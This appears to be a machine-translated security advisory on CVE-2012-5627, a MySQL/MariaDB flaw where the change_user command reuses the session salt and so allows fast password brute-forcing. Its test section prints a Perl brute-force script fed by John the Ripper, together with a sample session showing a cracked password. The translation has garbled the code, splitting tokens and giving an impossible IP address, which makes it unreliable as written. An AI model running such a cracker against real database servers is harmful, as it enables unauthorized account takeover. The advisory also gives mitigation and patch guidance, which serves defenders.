Improper handling of Oracle MySQL/MariaDB password SALT value Security Restriction Bypass Vulnerability

Release date: 2012-6 6
Updated on: 2012-12-09

Affected Systems:
Oracle MySQL
Oracle MariaDB
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56837
CVE (CAN) ID: CVE-2012-5627

Oracle MySQL Server is a small relational database management system. MariaDB is a MySQL branch version using the Maria storage engine and is a free open-source database server.

MySQL/MariaDB has a security vulnerability when processing the session User Password SALT value. When you try to log on to MySQL, a SALT value is generated, which is used throughout the session. The SALT value is required for sending the password. If the password is incorrectly connected, it will be disconnected. If you want to try a new password, you must reconnect it and the SALT will be generated again, this mechanism can effectively prevent brute-force cracking. However, when attackers use a non-privileged account to log on to the server, they can use the MySQL "change_user" command to try to switch other accounts. During this process, the SALT value does not need to be changed and the connection will not be disconnected, this allows attackers to quickly crack passwords and bypass security restrictions.

<* Source: Kingdom (kingcope@gmx.net)

Link: http://www.openwall.com/lists/oss-security/2012/12/06/4
Https://bugzilla.RedHat.com/show_bug.cgi? Id = 883719
Http://seclists.org/fulldisclosure/2012/Dec/58
Http://seclists.org/oss-sec/2012/q4/424
Https://mariadb.atlassian.net/browse/MDEV-3915
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Use Net: MySQL;

$ | = 1;

My $ mysql = Net: MySQL-> new (
Hostname => '2014. 168.2.3 ',
Database => 'test ',
User => "user ",
Password => "secret ",
Debug => 0,
);

$ Crackuser = "crackme ";

While (<stdin> ){
Chomp;
$ Currentpass =$ _;

$ Vv = join "\ 0 ",
$ Crackuser,
"\ X14 ".
Net: MySQL: Password-> scramble (
$ Currentpass, $ mysql-> {salt}, $ mysql-> {client_capabilities}
). "\ 0 ";
If ($ mysql-> _ execute_command ("\ x11", $ vv) ne undef ){
Print "[*] Cracked! --> $ Currentpass \ n ";
Exit;
}
}
---
Example session:

C: \ Users \ Kingdom \ Desktop> C: \ Users \ Kingdom \ Desktop \ john179 \ run \ jo
Hn -- incremental -- stdout = 5 | perl mysqlcrack. pl
Warning: MaxLen = 8 is too large for the current hash type, forced CED to 5
Words: 16382 time: 0: 00: 00: 02 w/s: 6262 current: citcH
Words: 24573 time: 0: 00: 00: 04 w/s: 4916 current: rap
Words: 40956 time: 0: 00: 00: 07 w/s: 5498 current: matc3
Words: 49147 time: 0: 00: 00: 09 w/s: 5030 current: 4429
Words: 65530 time: 0: 00: 00: 12 w/s: 5354 current: ch141
Words: 73721 time: 0: 00: 00: 14 w/s: 5021 current: v3n
Words: 90104 time: 0: 00: 00: 17 w/s: 5277 current: pun2
[*] Cracked! --> Pass
Words: 98295 time: 0: 00: 00: 18 w/s: 5434 current: 43gs
Session aborted

Suggestion:
--------------------------------------------------------------------------------
Temporary solution:

If you cannot install or upgrade the patch immediately, NSFOCUS recommends that you take the following measures to reduce the threat:

* Configure firewall rules or ACLs to only allow trusted users to access MySQL/MariaDB

Vendor patch:

Oracle
------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://www.oracle.com/technetwork/topics/security/